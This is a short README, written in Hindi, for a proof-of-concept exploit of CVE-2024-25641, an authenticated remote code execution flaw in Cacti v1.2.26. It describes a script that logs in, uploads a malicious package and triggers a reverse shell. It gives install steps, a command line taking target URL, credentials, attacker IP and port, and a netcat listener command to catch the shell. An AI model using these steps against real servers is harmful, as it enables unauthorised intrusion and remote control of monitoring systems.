
CVE-2024-25641 के लिए PoC: Cacti v1.2.26 पर प्रमाणित RCE
यह स्क्रिप्ट Cacti (एक वेब-आधारित मॉनिटरिंग टूल) में CVE-2024-25641 भेद्यता का शोषण करने के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) है। स्क्रिप्ट एप्लिकेशन के साथ प्रमाणीकरण, एक दुर्भावनापूर्ण पैकेज अपलोड करने, और रिवर्स शेल ट्रिगर करने की प्रक्रिया को स्वचालित करती है।
requests लाइब्रेरीargparse लाइब्रेरीre लाइब्रेरीआप निम्नलिखित कमांड का उपयोग करके आवश्यक Python लाइब्रेरी को pip3 से स्थापित कर सकते हैं:
pip3 install requests
pip3 install argparse
pip3 install re
(सुनिश्चित करें कि test.xml.gz को exploit.py के समान निर्देशिका में रखा गया है)
python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]
nc -nvlp <port>